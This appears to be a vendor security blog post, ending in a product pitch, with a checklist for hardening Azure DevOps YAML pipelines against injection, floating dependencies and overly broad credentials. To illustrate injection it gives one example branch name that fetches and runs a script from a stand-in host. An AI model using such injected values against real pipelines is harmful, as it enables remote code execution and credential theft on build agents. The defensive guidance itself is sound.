Most of the Azure DevOps incidents I have been called into over the last two years did not start with a zero-day. They started with a YAML file that the author did not realize was a program with attacker-controlled input. YAML pipelines in Azure DevOps are powerful — variables interpolate at multiple stages, templates can be pulled from other repositories, and tasks run with the full context of whatever service connection the pipeline has been granted. Every one of those is a feature. Every one of those is also an exploit path if you wire it up without thinking about it.
This post is the hardening checklist I now walk through with platform teams during their first review. It assumes you are running pipelines/*.yml on the modern agent, using Azure Pipelines (not Classic), and that you have at least one production environment gated through an approval.
Why YAML Pipelines Are Not Just Config
The first mental shift a team has to make is that an Azure DevOps YAML pipeline is not configuration. It is a program. The YAML parser expands three different layers — template expressions evaluated at queue time (${{ }}), runtime expressions evaluated at job start ($[ ]), and macro syntax evaluated at task execution ($( )). Each layer has different trust boundaries, and if you mix them up, you hand an attacker a shell.
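The three layers are easiest to keep straight side by side. A minimal sketch (variable names illustrative):

```yaml
variables:
  configuration: Release
  # Runtime expression: resolved at job start. Only valid as the full
  # right-hand side of a variable definition.
  resolvedConfig: $[ variables.configuration ]

steps:
  # Template expression: expanded at queue/compile time, before any agent runs.
  - bash: echo "compile-time value ${{ variables.configuration }}"
  # Macro syntax: substituted into the task input just before the task executes.
  - bash: echo "macro-time value $(resolvedConfig)"
```

The practical rule that falls out of this: any value that can carry attacker-controlled data must never reach a script body through macro or template expansion.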
The canonical example is a pipeline that runs on pr triggers against forks and prints the branch name in a bash task:
- bash: echo "Building $(Build.SourceBranchName)"
That looks innocent. It is not. $(Build.SourceBranchName) is a macro expansion, and on a pull request from a fork, the branch name is attacker-controlled. Git refnames cannot contain spaces, but they can contain ;, |, and $, so a branch named main;curl${IFS}evil.sh|bash becomes exactly that command sequence when the macro is spliced into the script. I have seen this exact pattern in production repositories at Fortune 500 companies. The fix is to quote the value and pass it through an environment variable:
- bash: echo "Building $BRANCH"
  env:
    BRANCH: $(Build.SourceBranchName)
The difference matters because macro expansion splices the value into the script text before the shell parses it, so metacharacters in the value become shell syntax. An environment variable's value is read after parsing and is never re-interpreted by the shell.
Pinning Task Versions and Template Sources
The second-biggest category of incidents is mutable references. Azure DevOps tasks are versioned, but the default syntax — task: AzureCLI@2 — floats to the latest minor version within the @2 major. If the task publisher is compromised, or if the task is updated in a way that changes behavior, your pipelines pick up the change silently on the next run. This is the same supply chain risk as floating latest on a Docker image, and it is just as avoidable.
For any task outside the Microsoft-published set, pin the specific minor version. For Microsoft-published tasks, accept the @N floating version on non-production pipelines and pin on production ones. If you use the newer Marketplace extension tasks, also record the publisher identifier and review extension updates through the Azure DevOps extension management policy before they reach pipelines.
Templates are worse, because templates execute at queue time with the permissions of whoever triggered the pipeline. A template referenced from another repository like this:
resources:
  repositories:
    - repository: templates
      type: git
      name: Shared/Templates
      ref: refs/heads/main
floats with main. Anyone who can push to Shared/Templates main can change every downstream pipeline. Pin to a commit SHA, not a branch, and rotate the pin through a pull request that runs its own review. This is the single control that has prevented the most real-world damage on the teams I work with.
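The pinned version of the same resource looks like this (the SHA here is illustrative):

```yaml
resources:
  repositories:
    - repository: templates
      type: git
      name: Shared/Templates
      # Pinned to a specific commit; moved only through a reviewed pull request.
      ref: 6c2f1e9d0b3a47c58e21f4a9d7b0c3e5a1f8d2b4
```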
Required Reviewers and Environment Approvals
Azure DevOps environments are underused. An environment in Azure DevOps is a deployment target with its own approval policy, and the approval policy is enforced by the service, not by YAML. That means a pipeline author cannot bypass an environment approval by editing the YAML — the approval is owned by the environment, not the pipeline.
For every production deployment target, create a named environment (prod-eastus, prod-eus2-payments, whatever your naming convention is) and attach a required approvers check. Set the minimum approvers to at least two for anything that touches customer data, and turn on the "approvers cannot approve their own runs" policy. That policy exists because the default lets a pipeline author approve their own deployment, which defeats the entire point of the approval.
Also turn on the "Exclusive lock" and "Business hours" checks where they fit. Exclusive lock prevents two runs from deploying to the same environment at the same time, which has caught more than one deployment-race bug in practice. Business hours checks prevent the 3 a.m. "quick hotfix" that bypasses reviewers because nobody is awake to object.
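Wiring a deployment job to an environment is all it takes for the service-side checks to apply; the approvers, locks, and business-hours windows are configured on the environment itself, not in YAML. A sketch with illustrative names:

```yaml
jobs:
  - deployment: DeployPayments
    # Every check attached to this environment runs before the job starts,
    # and no edit to this file can remove those checks.
    environment: prod-eus2-payments
    strategy:
      runOnce:
        deploy:
          steps:
            - bash: ./deploy.sh
```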
Service Connections and Federated Identity
The service connection is the single most valuable credential in an Azure DevOps organization. A contributor-scoped service connection to an Azure subscription is, effectively, contributor access to that subscription for anyone who can run a pipeline. Most organizations I review have at least one service connection scoped far too broadly — I regularly find Owner at the subscription level where Contributor on a single resource group would suffice.
Azure DevOps now supports workload identity federation for Azure service connections, and there is no good reason not to use it. Federated connections replace the long-lived client secret with an OIDC token exchange against Azure AD, so there is no secret in the service connection to leak. Conversion is a few clicks in the service connection UI and a one-time consent in Azure AD. Every new service connection the teams I advise stand up is federated; the existing secret-based ones are on a rolling conversion plan.
Scope service connections to the smallest Azure resource they need — a single resource group, or a single storage account — and put the connection in a dedicated project with tight pipeline permissions. Cross-project usage should be explicit, not implicit.
Runtime Parameters and the PR From Fork Problem
The parameters section of a YAML pipeline lets callers pass typed values into the pipeline. This is useful for internal callers. It is dangerous for external callers, because on a pull request from a fork, the parameters are attacker-controlled. If a parameter is interpolated into a shell script without quoting, you have the same injection bug as the branch name example earlier.
The right pattern is to validate parameter values with the values field and to never interpolate a parameter directly into a shell. Example:
parameters:
  - name: environment
    type: string
    values: [dev, staging, prod]
That restricts the parameter to one of three strings at queue time. Without values, the parameter accepts anything.
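Even a validated parameter is safest passed through an environment variable rather than spliced into the script, consistent with the branch-name fix earlier:

```yaml
steps:
  - bash: ./deploy.sh "$TARGET_ENV"
    env:
      # The template expression resolves at queue time; the shell only ever
      # sees an environment variable, never injected script text.
      TARGET_ENV: ${{ parameters.environment }}
```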
For PRs from forks, also turn off the "Automatically build pull requests" option on any pipeline that uses production service connections. The default builds forks with full pipeline permissions, which is almost never what you want. Require a manual comment trigger (/azp run) from a trusted maintainer instead, and only after a review of the PR's azure-pipelines.yml diff.
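For pipelines built from GitHub repositories, you can also make the intent explicit in the YAML itself by disabling the PR trigger; note that the fork-build and comment-trigger policies themselves live in the pipeline's UI settings, not in YAML:

```yaml
# No automatic PR builds; runs happen only via /azp run from a maintainer.
pr: none
```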
Secrets, Variable Groups, and Key Vault
Variable groups backed by Azure Key Vault are strictly better than variable groups with inline secrets, because the secrets do not exist in Azure DevOps at all — they are pulled at job start time from Key Vault through the service connection. This means a compromised Azure DevOps organization does not, by itself, give you the secrets.
Mark any non-Key-Vault secret as "secret" in the variable group, and never echo a secret variable in a task. The agent redacts secrets from logs on a best-effort basis, but the redaction is string-match based, and a transformed secret (base64, URL-encoded) will not be redacted. This has caused several real leaks. If you have to pass a secret to a downstream system, pass it through an environment variable or stdin, never through a command-line argument, which ends up in logs and process listings.
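The Key-Vault-backed pattern can be sketched with the AzureKeyVault task; the connection and vault names here are illustrative:

```yaml
steps:
  # Pulls only the named secret from Key Vault at job start, through the
  # (ideally federated) service connection. It becomes a secret variable
  # scoped to this job.
  - task: AzureKeyVault@2
    inputs:
      azureSubscription: kv-reader-connection
      KeyVaultName: payments-kv
      SecretsFilter: 'DbPassword'
  - bash: ./migrate.sh
    env:
      # Passed as an environment variable; never echoed, never on a
      # command line that would reach the logs.
      DB_PASSWORD: $(DbPassword)
```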
How Safeguard Helps
Safeguard ingests Azure DevOps pipeline definitions and flags the exact patterns above — floating task versions, unpinned template references, macro expansions of attacker-controlled variables, and service connections scoped more broadly than the pipeline needs. The platform correlates those findings with the service connection's Azure role assignments, so a broadly-scoped connection in a weakly-gated pipeline surfaces as a single high-priority finding rather than two low-priority ones. For federated identity rollouts, Safeguard tracks which service connections are still secret-backed and prioritizes the conversion work by blast radius. The net effect is that the YAML hardening review stops being a quarterly manual pass and becomes a continuous control.